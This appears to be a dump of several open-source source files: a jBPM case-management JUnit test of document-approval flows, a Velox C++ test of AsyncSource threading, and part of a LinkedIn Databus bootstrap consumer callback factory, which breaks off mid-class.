* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.jbpm.casemgmt.impl;
import static org.assertj.core.api.Assertions.assertThat;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collection;
import java.util.Date;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import org.jbpm.casemgmt.api.model.instance.CaseFileInstance;
import org.jbpm.casemgmt.api.model.instance.CaseStageInstance;
import org.jbpm.casemgmt.demo.enrichment.DocumentType;
import org.jbpm.casemgmt.impl.util.AbstractCaseServicesBaseTest;
import org.jbpm.document.service.impl.DocumentImpl;
import org.junit.Test;
import org.kie.api.runtime.query.QueryContext;
import org.kie.api.task.model.TaskSummary;
import org.kie.internal.query.QueryFilter;
/**
 * Tests ad-hoc conditions of the enrichment demo case: each "Upload Document"
 * task either auto-approves, auto-rejects, or routes to manual approval,
 * closing (or re-activating) its case stage accordingly.
 *
 * <p>Duplicated fixture code of the four scenarios is factored into private
 * helpers; the test methods themselves keep their original names and flow.
 */
public class AdHocConditionsTest extends AbstractCaseServicesBaseTest {

    private static final String ENRICHMENT_PROC_ID = "src.enrichment-case";

    @Override
    protected List<String> getProcessDefinitionFiles() {
        List<String> processes = new ArrayList<String>();
        processes.add("org/jbpm/casemgmt/demo/enrichment/enrichment-case.bpmn2");
        processes.add("org/jbpm/casemgmt/demo/enrichment/init.drl");
        return processes;
    }

    /** Starts a new enrichment case and asserts it is active as the first case. */
    private String startEnrichmentCase() {
        Map<String, Object> data = new HashMap<>();
        CaseFileInstance caseFile = caseService.newCaseFileInstance(deploymentUnit.getIdentifier(), ENRICHMENT_PROC_ID, data);
        String caseId = caseService.startCase(deploymentUnit.getIdentifier(), ENRICHMENT_PROC_ID, caseFile);
        assertThat(caseId).isNotNull().isEqualTo(FIRST_CASE_ID);
        assertCaseInstanceActive(caseId);
        return caseId;
    }

    /** Asserts the number of currently active stages of the given case. */
    private void assertActiveStages(String caseId, int expected) {
        Collection<CaseStageInstance> activeStages = caseRuntimeDataService.getCaseInstanceStages(caseId, true, new QueryContext());
        assertThat(activeStages).hasSize(expected);
    }

    /** Fetches john's tasks, asserts exactly the expected task names, returns them mapped by name. */
    private Map<String, TaskSummary> assertJohnTasks(String... expectedNames) {
        List<TaskSummary> tasks = runtimeDataService.getTasksAssignedAsPotentialOwner("john", new QueryFilter());
        assertThat(tasks).hasSize(expectedNames.length);
        Map<String, TaskSummary> mappedTasks = mapTaskSummaries(tasks);
        assertThat(mappedTasks).containsKeys(expectedNames);
        return mappedTasks;
    }

    /** Completes an upload task with a document whose name and content are {@code docName}. */
    private void completeUploadTask(TaskSummary task, String docName) {
        Map<String, Object> results = new HashMap<>();
        DocumentImpl document = new DocumentImpl(docName, 10l, new Date());
        document.setContent(docName.getBytes());
        results.put("uploadedDoc", document);
        userTaskService.completeAutoProgress(task.getId(), "john", results);
    }

    /** Completes a manual-approval task with the given decision payload. */
    private void completeApprovalTask(TaskSummary task, DocumentType decision) {
        Map<String, Object> results = new HashMap<>();
        results.put("decided", decision);
        userTaskService.completeAutoProgress(task.getId(), "john", results);
    }

    @Test
    public void testEnrichmentFlowNotValidManuallyApproved() throws Exception {
        String caseId = startEnrichmentCase();
        assertActiveStages(caseId, 3);

        identityProvider.setRoles(Arrays.asList("HR"));

        Map<String, TaskSummary> mappedTasks = assertJohnTasks("Additional Client Details",
                                                               "Upload Document jbpm",
                                                               "Upload Document enablement",
                                                               "Upload Document test");
        completeUploadTask(mappedTasks.get("Upload Document test"), "test");

        // the "test" document is routed to manual approval
        mappedTasks = assertJohnTasks("Additional Client Details",
                                      "Upload Document jbpm",
                                      "Upload Document enablement",
                                      "Manual Approval for test");
        TaskSummary approval = mappedTasks.get("Manual Approval for test");

        // the approval task must carry the uploaded document and its type info
        Map<String, Object> inputs = userTaskService.getTaskInputContentByTaskId(approval.getId());
        assertThat(inputs).containsKeys("documentFile", "documentType");
        assertThat(inputs.get("documentFile")).isNotNull();
        assertThat(inputs.get("documentType")).isNotNull();
        assertThat(inputs.get("documentFile")).isInstanceOf(DocumentImpl.class);
        assertThat(inputs.get("documentType")).isInstanceOf(DocumentType.class);
        assertThat(inputs.get("documentFile")).hasFieldOrPropertyWithValue("name", "test");
        assertThat(inputs.get("documentType")).hasFieldOrPropertyWithValue("name", "test");

        // approving the document completes its stage: 3 active stages -> 2
        completeApprovalTask(approval, new DocumentType("test", true, true, "txt", false));
        assertActiveStages(caseId, 2);

        caseService.destroyCase(caseId);
    }

    @Test
    public void testEnrichmentFlowNotValidManuallyRejected() throws Exception {
        String caseId = startEnrichmentCase();
        assertActiveStages(caseId, 3);

        identityProvider.setRoles(Arrays.asList("HR"));

        Map<String, TaskSummary> mappedTasks = assertJohnTasks("Additional Client Details",
                                                               "Upload Document jbpm",
                                                               "Upload Document enablement",
                                                               "Upload Document test");
        completeUploadTask(mappedTasks.get("Upload Document test"), "test");

        mappedTasks = assertJohnTasks("Additional Client Details",
                                      "Upload Document jbpm",
                                      "Upload Document enablement",
                                      "Manual Approval for test");
        // rejecting decision: the upload task is re-activated and all stages stay open
        completeApprovalTask(mappedTasks.get("Manual Approval for test"),
                             new DocumentType("test", true, false, "txt", true));

        assertJohnTasks("Additional Client Details",
                        "Upload Document jbpm",
                        "Upload Document enablement",
                        "Upload Document test");
        assertActiveStages(caseId, 3);

        caseService.destroyCase(caseId);
    }

    @Test
    public void testEnrichmentFlowNotValidDirectlyRejected() throws Exception {
        String caseId = startEnrichmentCase();
        assertActiveStages(caseId, 3);

        Map<String, TaskSummary> mappedTasks = assertJohnTasks("Additional Client Details",
                                                               "Upload Document jbpm",
                                                               "Upload Document enablement",
                                                               "Upload Document test");
        // "enablement" is rejected without manual approval: the upload task
        // reappears and no stage completes
        completeUploadTask(mappedTasks.get("Upload Document enablement"), "enablement");

        assertJohnTasks("Additional Client Details",
                        "Upload Document jbpm",
                        "Upload Document enablement",
                        "Upload Document test");
        assertActiveStages(caseId, 3);

        caseService.destroyCase(caseId);
    }

    @Test
    public void testEnrichmentFlowNotValidDirectlyApproved() throws Exception {
        String caseId = startEnrichmentCase();
        assertActiveStages(caseId, 3);

        Map<String, TaskSummary> mappedTasks = assertJohnTasks("Additional Client Details",
                                                               "Upload Document jbpm",
                                                               "Upload Document enablement",
                                                               "Upload Document test");
        // "jbpm" is approved without manual approval: its stage completes and
        // the upload task disappears
        completeUploadTask(mappedTasks.get("Upload Document jbpm"), "jbpm");

        assertJohnTasks("Additional Client Details",
                        "Upload Document enablement",
                        "Upload Document test");
        assertActiveStages(caseId, 2);

        caseService.destroyCase(caseId);
    }
}
| 5,825 |
672 | <filename>velox/common/tests/AsyncSourceTest.cpp
/*
* Copyright (c) Facebook, Inc. and its affiliates.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#include "velox/common/base/AsyncSource.h"
#include <fmt/format.h>
#include <folly/Random.h>
#include <folly/Synchronized.h>
#include <gtest/gtest.h>
#include <thread>
using namespace facebook::velox;
// A sample class to be constructed via AsyncSource.
struct Gizmo {
  explicit Gizmo(int32_t _id) : id(_id) {}
  const int32_t id;  // immutable identifier used by tests to check uniqueness
};
// Single-threaded contract: prepare() computes the value, move() hands it
// out exactly once, and hasValue() reflects both transitions.
TEST(AsyncSourceTest, basic) {
  AsyncSource<Gizmo> gizmo([]() { return std::make_unique<Gizmo>(11); });
  EXPECT_FALSE(gizmo.hasValue());
  gizmo.prepare();
  EXPECT_TRUE(gizmo.hasValue());
  auto value = gizmo.move();
  EXPECT_FALSE(gizmo.hasValue());  // the value has been consumed
  EXPECT_EQ(11, value->id);
}
// Multi-threaded contract: with producer threads calling prepare() and
// consumer threads racing on move(), every Gizmo is obtained exactly once
// and none is lost (the shared `results` set ends up with all ids).
TEST(AsyncSourceTest, threads) {
  constexpr int32_t kNumThreads = 10;
  constexpr int32_t kNumGizmos = 2000;
  folly::Synchronized<std::unordered_set<int32_t>> results;
  std::vector<std::shared_ptr<AsyncSource<Gizmo>>> gizmos;
  for (auto i = 0; i < kNumGizmos; ++i) {
    gizmos.push_back(std::make_shared<AsyncSource<Gizmo>>([i]() {
      std::this_thread::sleep_for(std::chrono::milliseconds(1)); // NOLINT
      return std::make_unique<Gizmo>(i);
    }));
  }
  std::vector<std::thread> threads;
  threads.reserve(kNumThreads);
  for (int32_t threadIndex = 0; threadIndex < kNumThreads; ++threadIndex) {
    threads.push_back(std::thread([threadIndex, &gizmos, &results]() {
      if (threadIndex < kNumThreads / 2) {
        // The first half of the threads prepare Gizmos in the background.
        for (auto i = 0; i < kNumGizmos; ++i) {
          gizmos[i]->prepare();
        }
      } else {
        // The rest of the threads first get random Gizmos and then do a pass
        // over all the Gizmos to make sure all get collected. We assert that
        // each Gizmo is obtained once.
        folly::Random::DefaultGenerator rng;
        for (auto i = 0; i < kNumGizmos / 3; ++i) {
          auto gizmo =
              gizmos[folly::Random::rand32(rng) % gizmos.size()]->move();
          if (gizmo) {
            results.withWLock([&](auto& set) {
              EXPECT_TRUE(set.find(gizmo->id) == set.end());
              set.insert(gizmo->id);
            });
          }
        }
        for (auto i = 0; i < gizmos.size(); ++i) {
          auto gizmo = gizmos[i]->move();
          if (gizmo) {
            results.withWLock([&](auto& set) {
              EXPECT_TRUE(set.find(gizmo->id) == set.end());
              set.insert(gizmo->id);
            });
          }
        }
      }
    }));
  }
  for (auto& thread : threads) {
    thread.join();
  }
  // Every id must have been collected by exactly one consumer.
  results.withRLock([&](auto& set) {
    for (auto i = 0; i < kNumGizmos; ++i) {
      EXPECT_TRUE(set.find(i) != set.end());
    }
  });
}
| 1,409 |
2,989 | package com.linkedin.databus.client.consumer;
/*
*
* Copyright 2013 LinkedIn Corp. All rights reserved
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*
*/
import org.apache.avro.Schema;
import com.linkedin.databus.client.pub.ConsumerCallbackResult;
import com.linkedin.databus.client.pub.DatabusCombinedConsumer;
import com.linkedin.databus.client.pub.DbusEventDecoder;
import com.linkedin.databus.client.pub.SCN;
import com.linkedin.databus.client.pub.mbean.ConsumerCallbackStats;
import com.linkedin.databus.client.pub.mbean.UnifiedClientStats;
import com.linkedin.databus.core.DbusConstants;
import com.linkedin.databus.core.DbusEvent;
import com.linkedin.databus.core.DbusEventInternalWritable;
/**
 * A factory for bootstrap-consumer callbacks.
 *
 * <p>Each {@code create*Callable} method wraps one {@link DatabusCombinedConsumer}
 * bootstrap callback in a {@link ConsumerCallable}. When {@code updateStats} is
 * true the callable is constructed with this factory's stats collectors so its
 * outcome and timing are recorded; when false it is constructed with null stats
 * and records nothing.
 */
public class BootstrapConsumerCallbackFactory implements ConsumerCallbackFactory<DatabusCombinedConsumer>
{
  // Stats sinks shared by all callables created with updateStats == true;
  // either may be null.
  protected final ConsumerCallbackStats _consumerStats;
  protected final UnifiedClientStats _unifiedClientStats;

  public BootstrapConsumerCallbackFactory(ConsumerCallbackStats consumerStats,
                                          UnifiedClientStats unifiedClientStats)
  {
    _consumerStats = consumerStats;
    _unifiedClientStats = unifiedClientStats;
  }

  @Override
  public ConsumerCallable<ConsumerCallbackResult> createCheckpointCallable(long currentNanos,
                                                                           SCN scn,
                                                                           DatabusCombinedConsumer consumer,
                                                                           boolean updateStats)
  {
    if (updateStats) {
      return new BootstrapCheckpointCallable(currentNanos, scn, consumer, _consumerStats, _unifiedClientStats);
    } else {
      return new BootstrapCheckpointCallable(currentNanos, scn, consumer, null, null);
    }
  }

  @Override
  public ConsumerCallable<ConsumerCallbackResult> createDataEventCallable(long currentNanos,
                                                                          DbusEvent e,
                                                                          DbusEventDecoder eventDecoder,
                                                                          DatabusCombinedConsumer consumer,
                                                                          boolean updateStats)
  {
    if (updateStats) {
      return new BootstrapDataEventCallable(currentNanos, e, eventDecoder, consumer, _consumerStats, _unifiedClientStats);
    } else {
      return new BootstrapDataEventCallable(currentNanos, e, eventDecoder, consumer, null, null);
    }
  }

  @Override
  public ConsumerCallable<ConsumerCallbackResult> createEndConsumptionCallable(long currentNanos,
                                                                               DatabusCombinedConsumer consumer,
                                                                               boolean updateStats)
  {
    if (updateStats) {
      return new StopBootstrapCallable(currentNanos, consumer, _consumerStats, _unifiedClientStats);
    } else {
      return new StopBootstrapCallable(currentNanos, consumer, null, null);
    }
  }

  @Override
  public ConsumerCallable<ConsumerCallbackResult> createEndDataEventSequenceCallable(long currentNanos,
                                                                                     SCN scn,
                                                                                     DatabusCombinedConsumer consumer,
                                                                                     boolean updateStats)
  {
    if (updateStats) {
      return new EndBootstrapEventSequenceCallable(currentNanos, scn, consumer, _consumerStats, _unifiedClientStats);
    } else {
      return new EndBootstrapEventSequenceCallable(currentNanos, scn, consumer, null, null);
    }
  }

  @Override
  public ConsumerCallable<ConsumerCallbackResult> createEndSourceCallable(long currentNanos,
                                                                          String source,
                                                                          Schema sourceSchema,
                                                                          DatabusCombinedConsumer consumer,
                                                                          boolean updateStats)
  {
    if (updateStats) {
      return new EndBootstrapSourceCallable(currentNanos, source, sourceSchema, consumer, _consumerStats, _unifiedClientStats);
    } else {
      return new EndBootstrapSourceCallable(currentNanos, source, sourceSchema, consumer, null, null);
    }
  }

  @Override
  public ConsumerCallable<ConsumerCallbackResult> createRollbackCallable(long currentNanos,
                                                                         SCN scn,
                                                                         DatabusCombinedConsumer consumer,
                                                                         boolean updateStats)
  {
    if (updateStats) {
      return new BootstrapRollbackCallable(currentNanos, scn, consumer, _consumerStats, _unifiedClientStats);
    } else {
      return new BootstrapRollbackCallable(currentNanos, scn, consumer, null, null);
    }
  }

  @Override
  public ConsumerCallable<ConsumerCallbackResult> createStartConsumptionCallable(long currentNanos,
                                                                                 DatabusCombinedConsumer consumer,
                                                                                 boolean updateStats)
  {
    if (updateStats) {
      return new StartBootstrapCallable(currentNanos, consumer, _consumerStats, _unifiedClientStats);
    } else {
      return new StartBootstrapCallable(currentNanos, consumer, null, null);
    }
  }

  @Override
  public ConsumerCallable<ConsumerCallbackResult> createStartDataEventSequenceCallable(long currentNanos,
                                                                                       SCN scn,
                                                                                       DatabusCombinedConsumer consumer,
                                                                                       boolean updateStats)
  {
    if (updateStats) {
      return new StartBootstrapEventSequenceCallable(currentNanos, scn, consumer, _consumerStats, _unifiedClientStats);
    } else {
      return new StartBootstrapEventSequenceCallable(currentNanos, scn, consumer, null, null);
    }
  }

  @Override
  public ConsumerCallable<ConsumerCallbackResult> createStartSourceCallable(long currentNanos,
                                                                            String source,
                                                                            Schema sourceSchema,
                                                                            DatabusCombinedConsumer consumer,
                                                                            boolean updateStats)
  {
    if (updateStats) {
      return new StartBootstrapSourceCallable(currentNanos, source, sourceSchema, consumer, _consumerStats, _unifiedClientStats);
    } else {
      return new StartBootstrapSourceCallable(currentNanos, source, sourceSchema, consumer, null, null);
    }
  }

  @Override
  public ConsumerCallable<ConsumerCallbackResult> createOnErrorCallable(long currentNanos,
                                                                        Throwable err,
                                                                        DatabusCombinedConsumer consumer,
                                                                        boolean updateStats)
  {
    if (updateStats) {
      return new OnBootstrapErrorCallable(currentNanos, err, consumer, _consumerStats, _unifiedClientStats);
    } else {
      return new OnBootstrapErrorCallable(currentNanos, err, consumer, null, null);
    }
  }
}
/**
 * Callable that delivers {@code onBootstrapError(err)} to the consumer.
 * Stats fields may be null, in which case nothing is recorded.
 */
class OnBootstrapErrorCallable extends ConsumerCallable<ConsumerCallbackResult>
{
  private final Throwable _err;
  private final DatabusCombinedConsumer _consumer;
  private final ConsumerCallbackStats _consumerStats;
  private final UnifiedClientStats _unifiedClientStats;

  public OnBootstrapErrorCallable(long currentNanos, Throwable err,
                                  DatabusCombinedConsumer consumer,
                                  ConsumerCallbackStats consumerStats,
                                  UnifiedClientStats unifiedClientStats)
  {
    super(currentNanos);
    _err = err;
    _consumer = consumer;
    _consumerStats = consumerStats;
    _unifiedClientStats = unifiedClientStats;
  }

  @Override
  protected ConsumerCallbackResult doCall() throws Exception
  {
    return _consumer.onBootstrapError(_err);
  }

  @Override
  protected void doEndCall(ConsumerCallbackResult result)
  {
    // On failure count an error; otherwise record one processed event,
    // charged with total time = queue wait + run time (ns converted to ms).
    if (result==ConsumerCallbackResult.ERROR || result==ConsumerCallbackResult.ERROR_FATAL)
    {
      if (_consumerStats != null) _consumerStats.registerErrorEventsProcessed(1);
      if (_unifiedClientStats != null) _unifiedClientStats.registerCallbackError();
    }
    else
    {
      long nanoRunTime = getNanoRunTime();
      if (_consumerStats != null)
      {
        long totalTime = (nanoRunTime + getNanoTimeInQueue()) / DbusConstants.NUM_NSECS_IN_MSEC;
        _consumerStats.registerEventsProcessed(1, totalTime);
      }
      if (_unifiedClientStats != null)
      {
        _unifiedClientStats.registerCallbacksProcessed(nanoRunTime);
      }
    }
  }
}
/**
 * Callable that delivers {@code onBootstrapCheckpoint(scn)} to the consumer.
 * A failed checkpoint callback is downgraded to SKIP_CHECKPOINT so the
 * dispatcher skips persisting rather than treating it as a hard error.
 */
class BootstrapCheckpointCallable extends ConsumerCallable<ConsumerCallbackResult>
{
  private final SCN _scn;
  private final DatabusCombinedConsumer _consumer;
  private final ConsumerCallbackStats _consumerStats;
  private final UnifiedClientStats _unifiedClientStats;

  public BootstrapCheckpointCallable(long currentNanos,
                                     SCN scn,
                                     DatabusCombinedConsumer consumer,
                                     ConsumerCallbackStats consumerStats,
                                     UnifiedClientStats unifiedClientStats)
  {
    super(currentNanos);
    _scn = scn;
    _consumer = consumer;
    _consumerStats = consumerStats;
    _unifiedClientStats = unifiedClientStats;
  }

  @Override
  protected ConsumerCallbackResult doCall() throws Exception
  {
    // map ERROR/ERROR_FATAL to SKIP_CHECKPOINT (see class comment)
    ConsumerCallbackResult res = _consumer.onBootstrapCheckpoint(_scn);
    return ConsumerCallbackResult.isFailure(res) ? ConsumerCallbackResult.SKIP_CHECKPOINT : res;
  }

  @Override
  protected void doEndCall(ConsumerCallbackResult result)
  {
    // On failure count an error; otherwise record one processed event,
    // charged with total time = queue wait + run time (ns converted to ms).
    if (result==ConsumerCallbackResult.ERROR || result==ConsumerCallbackResult.ERROR_FATAL)
    {
      if (_consumerStats != null) _consumerStats.registerErrorEventsProcessed(1);
      if (_unifiedClientStats != null) _unifiedClientStats.registerCallbackError();
    }
    else
    {
      long nanoRunTime = getNanoRunTime();
      if (_consumerStats != null)
      {
        long totalTime = (nanoRunTime + getNanoTimeInQueue()) / DbusConstants.NUM_NSECS_IN_MSEC;
        _consumerStats.registerEventsProcessed(1, totalTime);
      }
      if (_unifiedClientStats != null)
      {
        _unifiedClientStats.registerCallbacksProcessed(nanoRunTime);
      }
    }
  }
}
/**
 * Callable that delivers {@code onBootstrapEvent(event, decoder)} to the
 * consumer. The event is cloned in the constructor because the underlying
 * buffer slot may be recycled before the callable runs.
 */
class BootstrapDataEventCallable extends ConsumerCallable<ConsumerCallbackResult>
{
  private final DbusEvent _event;
  private final DbusEventDecoder _eventDecoder;
  private final DatabusCombinedConsumer _consumer;
  private final ConsumerCallbackStats _consumerStats;
  private final UnifiedClientStats _unifiedClientStats;

  public BootstrapDataEventCallable(long currentNanos,
                                    DbusEvent e,
                                    DbusEventDecoder eventDecoder,
                                    DatabusCombinedConsumer consumer)
  {
    this(currentNanos, e, eventDecoder, consumer, null, null);
  }

  public BootstrapDataEventCallable(long currentNanos,
                                    DbusEvent e,
                                    DbusEventDecoder eventDecoder,
                                    DatabusCombinedConsumer consumer,
                                    ConsumerCallbackStats consumerStats,
                                    UnifiedClientStats unifiedClientStats)
  {
    super(currentNanos);
    // NOTE(review): UnsupportedClassVersionError is a JVM linkage error;
    // IllegalArgumentException would fit better here. Kept as-is since
    // existing callers may depend on the thrown type.
    if (!(e instanceof DbusEventInternalWritable)) {
      throw new UnsupportedClassVersionError("Cannot support cloning on non-DbusEvent");
    }
    _event = ((DbusEventInternalWritable)e).clone(null);
    _eventDecoder = eventDecoder;
    _consumer = consumer;
    _consumerStats = consumerStats;
    _unifiedClientStats = unifiedClientStats;
  }

  @Override
  protected ConsumerCallbackResult doCall() throws Exception
  {
    return _consumer.onBootstrapEvent(_event, _eventDecoder);
  }

  @Override
  protected void doEndCall(ConsumerCallbackResult result)
  {
    // On failure count a data error; otherwise record the data event,
    // charged with total time = queue wait + run time (ns converted to ms).
    if (result==ConsumerCallbackResult.ERROR || result==ConsumerCallbackResult.ERROR_FATAL)
    {
      if (_consumerStats != null) _consumerStats.registerDataErrorsProcessed();
      if (_unifiedClientStats != null) _unifiedClientStats.registerCallbackError();
    }
    else
    {
      long nanoRunTime = getNanoRunTime();
      if (_consumerStats != null)
      {
        long totalTime = (nanoRunTime + getNanoTimeInQueue()) / DbusConstants.NUM_NSECS_IN_MSEC;
        _consumerStats.registerDataEventsProcessed(1, totalTime, _event);
      }
      if (_unifiedClientStats != null)
      {
        _unifiedClientStats.registerCallbacksProcessed(nanoRunTime);
      }
    }
  }
}
/**
 * Callable that delivers {@code onStopBootstrap()} to the consumer.
 * Stats fields may be null, in which case nothing is recorded.
 */
class StopBootstrapCallable extends ConsumerCallable<ConsumerCallbackResult>
{
  private final DatabusCombinedConsumer _consumer;
  private final ConsumerCallbackStats _consumerStats;
  private final UnifiedClientStats _unifiedClientStats;

  public StopBootstrapCallable(long currentNanos,
                               DatabusCombinedConsumer consumer,
                               ConsumerCallbackStats consumerStats,
                               UnifiedClientStats unifiedClientStats)
  {
    super(currentNanos);
    _consumer = consumer;
    _consumerStats = consumerStats;
    _unifiedClientStats = unifiedClientStats;
  }

  @Override
  protected ConsumerCallbackResult doCall() throws Exception
  {
    return _consumer.onStopBootstrap();
  }

  @Override
  protected void doEndCall(ConsumerCallbackResult result)
  {
    // On failure count an error; otherwise record one processed event,
    // charged with total time = queue wait + run time (ns converted to ms).
    if (result==ConsumerCallbackResult.ERROR || result==ConsumerCallbackResult.ERROR_FATAL)
    {
      if (_consumerStats != null) _consumerStats.registerErrorEventsProcessed(1);
      if (_unifiedClientStats != null) _unifiedClientStats.registerCallbackError();
    }
    else
    {
      long nanoRunTime = getNanoRunTime();
      if (_consumerStats != null)
      {
        long totalTime = (nanoRunTime + getNanoTimeInQueue()) / DbusConstants.NUM_NSECS_IN_MSEC;
        _consumerStats.registerEventsProcessed(1, totalTime);
      }
      if (_unifiedClientStats != null)
      {
        _unifiedClientStats.registerCallbacksProcessed(nanoRunTime);
      }
    }
  }
}
class EndBootstrapEventSequenceCallable extends ConsumerCallable<ConsumerCallbackResult>
{
private final SCN _scn;
private final DatabusCombinedConsumer _consumer;
private final ConsumerCallbackStats _consumerStats;
private final UnifiedClientStats _unifiedClientStats;
public EndBootstrapEventSequenceCallable(long currentNanos, SCN scn,
DatabusCombinedConsumer consumer,
ConsumerCallbackStats consumerStats,
UnifiedClientStats unifiedClientStats)
{
super(currentNanos);
_scn = scn;
_consumer = consumer;
_consumerStats = consumerStats;
_unifiedClientStats = unifiedClientStats;
}
@Override
protected ConsumerCallbackResult doCall() throws Exception
{
return _consumer.onEndBootstrapSequence(_scn);
}
@Override
protected void doEndCall(ConsumerCallbackResult result)
{
if (result==ConsumerCallbackResult.ERROR || result==ConsumerCallbackResult.ERROR_FATAL)
{
if (_consumerStats != null) _consumerStats.registerSysErrorsProcessed();
if (_unifiedClientStats != null) _unifiedClientStats.registerCallbackError();
}
else
{
long nanoRunTime = getNanoRunTime();
if (_consumerStats != null)
{
long totalTime = (nanoRunTime + getNanoTimeInQueue()) / DbusConstants.NUM_NSECS_IN_MSEC;
_consumerStats.registerSystemEventProcessed(totalTime);
}
if (_unifiedClientStats != null)
{
_unifiedClientStats.registerCallbacksProcessed(nanoRunTime);
}
}
}
}
class EndBootstrapSourceCallable extends ConsumerCallable<ConsumerCallbackResult>
{
private final String _source;
private final Schema _sourceSchema;
private final DatabusCombinedConsumer _consumer;
private final ConsumerCallbackStats _consumerStats;
private final UnifiedClientStats _unifiedClientStats;
public EndBootstrapSourceCallable(long currentNanos,
String source,
Schema sourceSchema,
DatabusCombinedConsumer consumer,
ConsumerCallbackStats consumerStats,
UnifiedClientStats unifiedClientStats)
{
super(currentNanos);
_source = source;
_sourceSchema = sourceSchema;
_consumer = consumer;
_consumerStats = consumerStats;
_unifiedClientStats = unifiedClientStats;
}
@Override
protected ConsumerCallbackResult doCall() throws Exception
{
return _consumer.onEndBootstrapSource(_source, _sourceSchema);
}
@Override
protected void doEndCall(ConsumerCallbackResult result)
{
if (result==ConsumerCallbackResult.ERROR || result==ConsumerCallbackResult.ERROR_FATAL)
{
if (_consumerStats != null) _consumerStats.registerErrorEventsProcessed(1);
if (_unifiedClientStats != null) _unifiedClientStats.registerCallbackError();
}
else
{
long nanoRunTime = getNanoRunTime();
if (_consumerStats != null)
{
long totalTime = (nanoRunTime + getNanoTimeInQueue()) / DbusConstants.NUM_NSECS_IN_MSEC;
_consumerStats.registerEventsProcessed(1, totalTime);
}
if (_unifiedClientStats != null)
{
_unifiedClientStats.registerCallbacksProcessed(nanoRunTime);
}
}
}
}
class BootstrapRollbackCallable extends ConsumerCallable<ConsumerCallbackResult>
{
private final SCN _scn;
private final DatabusCombinedConsumer _consumer;
private final ConsumerCallbackStats _consumerStats;
private final UnifiedClientStats _unifiedClientStats;
public BootstrapRollbackCallable(long currentNanos, SCN scn,
DatabusCombinedConsumer consumer,
ConsumerCallbackStats consumerStats,
UnifiedClientStats unifiedClientStats)
{
super(currentNanos);
_scn = scn;
_consumer = consumer;
_consumerStats = consumerStats;
_unifiedClientStats = unifiedClientStats;
}
@Override
protected ConsumerCallbackResult doCall() throws Exception
{
return _consumer.onBootstrapRollback(_scn);
}
@Override
protected void doEndCall(ConsumerCallbackResult result)
{
if (result==ConsumerCallbackResult.ERROR || result==ConsumerCallbackResult.ERROR_FATAL)
{
if (_consumerStats != null) _consumerStats.registerErrorEventsProcessed(1);
if (_unifiedClientStats != null) _unifiedClientStats.registerCallbackError();
}
else
{
long nanoRunTime = getNanoRunTime();
if (_consumerStats != null)
{
long totalTime = (nanoRunTime + getNanoTimeInQueue()) / DbusConstants.NUM_NSECS_IN_MSEC;
_consumerStats.registerEventsProcessed(1, totalTime);
}
if (_unifiedClientStats != null)
{
_unifiedClientStats.registerCallbacksProcessed(nanoRunTime);
}
}
}
}
class StartBootstrapCallable extends ConsumerCallable<ConsumerCallbackResult>
{
private final DatabusCombinedConsumer _consumer;
private final ConsumerCallbackStats _consumerStats;
private final UnifiedClientStats _unifiedClientStats;
public StartBootstrapCallable(long currentNanos,
DatabusCombinedConsumer consumer,
ConsumerCallbackStats consumerStats,
UnifiedClientStats unifiedClientStats)
{
super(currentNanos);
_consumer = consumer;
_consumerStats = consumerStats;
_unifiedClientStats = unifiedClientStats;
}
@Override
protected ConsumerCallbackResult doCall() throws Exception
{
return _consumer.onStartBootstrap();
}
@Override
protected void doEndCall(ConsumerCallbackResult result)
{
if (result==ConsumerCallbackResult.ERROR || result==ConsumerCallbackResult.ERROR_FATAL)
{
if (_consumerStats != null) _consumerStats.registerErrorEventsProcessed(1);
if (_unifiedClientStats != null) _unifiedClientStats.registerCallbackError();
}
else
{
long nanoRunTime = getNanoRunTime();
if (_consumerStats != null)
{
long totalTime = (nanoRunTime + getNanoTimeInQueue()) / DbusConstants.NUM_NSECS_IN_MSEC;
_consumerStats.registerEventsProcessed(1, totalTime);
}
if (_unifiedClientStats != null)
{
_unifiedClientStats.registerCallbacksProcessed(nanoRunTime);
}
}
}
}
class StartBootstrapEventSequenceCallable extends ConsumerCallable<ConsumerCallbackResult>
{
private final SCN _scn;
private final DatabusCombinedConsumer _consumer;
private final ConsumerCallbackStats _consumerStats;
private final UnifiedClientStats _unifiedClientStats;
public StartBootstrapEventSequenceCallable(long currentNanos, SCN scn,
DatabusCombinedConsumer consumer,
ConsumerCallbackStats consumerStats,
UnifiedClientStats unifiedClientStats)
{
super(currentNanos);
_scn = scn;
_consumer = consumer;
_consumerStats = consumerStats;
_unifiedClientStats = unifiedClientStats;
}
@Override
protected ConsumerCallbackResult doCall() throws Exception
{
return _consumer.onStartBootstrapSequence(_scn);
}
@Override
protected void doEndCall(ConsumerCallbackResult result)
{
if (result==ConsumerCallbackResult.ERROR || result==ConsumerCallbackResult.ERROR_FATAL)
{
if (_consumerStats != null) _consumerStats.registerErrorEventsProcessed(1);
if (_unifiedClientStats != null) _unifiedClientStats.registerCallbackError();
}
else
{
long nanoRunTime = getNanoRunTime();
if (_consumerStats != null)
{
long totalTime = (nanoRunTime + getNanoTimeInQueue()) / DbusConstants.NUM_NSECS_IN_MSEC;
_consumerStats.registerEventsProcessed(1, totalTime);
}
if (_unifiedClientStats != null)
{
_unifiedClientStats.registerCallbacksProcessed(nanoRunTime);
}
}
}
}
class StartBootstrapSourceCallable extends ConsumerCallable<ConsumerCallbackResult>
{
private final String _source;
private final Schema _sourceSchema;
private final DatabusCombinedConsumer _consumer;
private final ConsumerCallbackStats _consumerStats;
private final UnifiedClientStats _unifiedClientStats;
public StartBootstrapSourceCallable(long currentNanos,
String source,
Schema sourceSchema,
DatabusCombinedConsumer consumer,
ConsumerCallbackStats consumerStats,
UnifiedClientStats unifiedClientStats)
{
super(currentNanos);
_source = source;
